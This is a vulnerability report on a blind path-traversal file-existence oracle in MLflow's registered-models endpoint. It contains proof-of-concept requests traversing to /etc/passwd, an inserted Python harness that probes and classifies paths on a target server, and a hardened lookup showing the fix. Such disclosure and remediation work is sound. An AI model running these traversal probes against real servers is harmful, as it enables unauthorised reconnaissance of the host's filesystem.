Blind LFI in registered-models/get?name= in mlflow/mlflow
Reported on
Mar 3rd 2023
Description
A blind LFI (path traversal in the name parameter, exploitable as a file-existence oracle) exists in /ajax-api/2.0/mlflow/registered-models/get?name=
The server's response differs depending on whether the path reached by the traversal exists on the local filesystem. When the targeted local file exists, the server responds with 500 INTERNAL SERVER ERROR; when it does not exist, the server responds with 404 NOT FOUND. The file contents are not returned in either case, so the status code alone is the oracle.
Proof of Concept
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/passwd HTTP/1.1
Returns 500 INTERNAL SERVER ERROR because /etc/passwd exists on the server.
GET /ajax-api/2.0/mlflow/registered-models/get?name=../../../../../../../../../etc/doesNotExist HTTP/1.1
Returns 404 NOT FOUND because /etc/doesNotExist is not a file on the local filesystem.
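The two requests above can be turned into a small probing harness that classifies each candidate path from the status code. This is an added example, not part of the original report or of the MLflow project. It assumes the same nine-segment "../" prefix as the PoC (the exact depth of the store root is unknown, and extra segments past "/" are harmless on POSIX) and keeps the transport injectable so the logic can be exercised offline against a constructed stand-in for a vulnerable server.

```python
"""Drive the status-code oracle described in the report against candidate paths.

Added example; not the report's or MLflow's code. The "../" depth and the
fake server below are assumptions made so the script runs stand-alone.
"""
import urllib.error
import urllib.request
from typing import Callable, Dict, Iterable

ENDPOINT = "/ajax-api/2.0/mlflow/registered-models/get"
TRAVERSAL = "../" * 9  # same prefix as the PoC; surplus segments stop at "/"


def probe_url(base_url: str, target: str) -> str:
    """Build the oracle request for an absolute target path such as /etc/passwd.

    The PoC sends the traversal unencoded, so it is left unencoded here as well;
    percent-encoding the slashes could change how the server parses the name.
    """
    return f"{base_url.rstrip('/')}{ENDPOINT}?name={TRAVERSAL}{target.lstrip('/')}"


def classify(status: int) -> str:
    """Map the server's status code onto the oracle's verdict."""
    if status == 500:
        return "exists"
    if status == 404:
        return "absent"
    # 200 would mean a registered model of that literal name exists; anything
    # else (e.g. 400 after a fix) means the oracle is not behaving as reported.
    return "unknown"


def http_status(url: str) -> int:
    """Default transport: return the HTTP status even for 4xx/5xx responses."""
    req = urllib.request.Request(url, method="GET")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def enumerate_paths(base_url: str, targets: Iterable[str],
                    fetch: Callable[[str], int] = http_status) -> Dict[str, str]:
    """Probe every target path and return {path: verdict}."""
    return {t: classify(fetch(probe_url(base_url, t))) for t in targets}


# Constructed stand-in for a vulnerable server (assumption, for offline use):
# it answers 500 when the de-traversed path is in this set and 404 otherwise.
FAKE_EXISTING = {"/etc/passwd", "/etc/hostname"}


def fake_status(url: str) -> int:
    name = url.split("?name=", 1)[1]
    path = "/" + name.replace("../", "")
    return 500 if path in FAKE_EXISTING else 404


if __name__ == "__main__":
    verdicts = enumerate_paths("http://127.0.0.1:5000",
                               ["/etc/passwd", "/etc/doesNotExist"],
                               fetch=fake_status)
    for path, verdict in verdicts.items():
        print(f"{verdict:7s} {path}")
```

Against a real target, drop the fetch argument so the urllib transport is used; the classify() step is deliberately strict so that a patched server (which should answer the same way for both requests) shows up as "unknown" rather than as a false "absent".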
Impact
Allows an attacker to confirm whether arbitrary paths exist on the host running the MLflow server, and thereby to enumerate files, installed software and running services by probing their well-known file locations, without authentication being discussed in this report.
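The behaviour in the report is what a lookup that joins the model name straight into a store path produces, and the fix is to validate the name and confine the resolved path to the store root while answering identically for every rejected name. The following is an added example and not MLflow's own code; it assumes (the page does not say) a file-backed registry laid out as store_root/models/NAME/meta.yaml, builds that layout in a temporary directory, and shows the vulnerable lookup beside a hardened one.

```python
"""Model of the traversal root cause and a hardened replacement.

Added example; not the report's or MLflow's code. The store layout
(store_root/models/NAME/meta.yaml) and the name allow-list are assumptions.
"""
import os
import re
import shutil
import tempfile


class NotFound(Exception):
    """Corresponds to the 404 the report observes for absent paths."""


class InternalError(Exception):
    """Corresponds to the 500 the report observes when the target exists."""


# Assumed allow-list for model names: no path separators, no traversal.
NAME_RE = re.compile(r"^[A-Za-z0-9_.\- ]+$")


def lookup_vulnerable(store_root: str, name: str) -> str:
    """Join the caller-supplied name into the store path.

    Whether the joined path exists decides which exception is raised, and the
    exception type decides the status code: that difference is the oracle.
    """
    model_dir = os.path.join(store_root, "models", name)
    if not os.path.exists(model_dir):
        raise NotFound(name)
    meta = os.path.join(model_dir, "meta.yaml")
    if not os.path.isfile(meta):
        # A regular file (e.g. /etc/passwd) or a foreign directory lands here.
        raise InternalError(f"malformed model entry: {model_dir}")
    return meta


def lookup_hardened(store_root: str, name: str) -> str:
    """Reject anything but a plain name, then confirm the path stays under the root.

    Every rejection raises NotFound so the caller sees one status code whether the
    name was malformed, escaped the root, or simply does not exist.
    """
    if not NAME_RE.fullmatch(name) or name in (".", ".."):
        raise NotFound(name)
    models_root = os.path.realpath(os.path.join(store_root, "models"))
    model_dir = os.path.realpath(os.path.join(models_root, name))
    if os.path.commonpath([models_root, model_dir]) != models_root:
        raise NotFound(name)  # belt and braces: symlinks cannot lead outside
    meta = os.path.join(model_dir, "meta.yaml")
    if not os.path.isfile(meta):
        raise NotFound(name)
    return meta


def status_for(lookup, store_root: str, name: str) -> int:
    """Translate the lookup outcome into the HTTP status an API layer would send."""
    try:
        lookup(store_root, name)
        return 200
    except NotFound:
        return 404
    except InternalError:
        return 500


def demo() -> dict:
    """Constructed layout: one real model plus a file outside the store root."""
    tmp = tempfile.mkdtemp()
    try:
        store = os.path.join(tmp, "mlruns")
        os.makedirs(os.path.join(store, "models", "fraud-detector"))
        open(os.path.join(store, "models", "fraud-detector", "meta.yaml"), "w").close()
        open(os.path.join(tmp, "secret.txt"), "w").close()  # stands in for /etc/passwd
        probes = ["fraud-detector", "../../secret.txt", "../../nope.txt"]
        return {
            "vulnerable": {p: status_for(lookup_vulnerable, store, p) for p in probes},
            "hardened": {p: status_for(lookup_hardened, store, p) for p in probes},
        }
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for variant, results in demo().items():
        print(variant, results)
```

The vulnerable variant answers 200, 500 and 404 for the three probes; the hardened variant answers 200, 404 and 404, which is the property that closes the oracle: an existing file outside the root and a missing one are indistinguishable to the client.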
Validated privately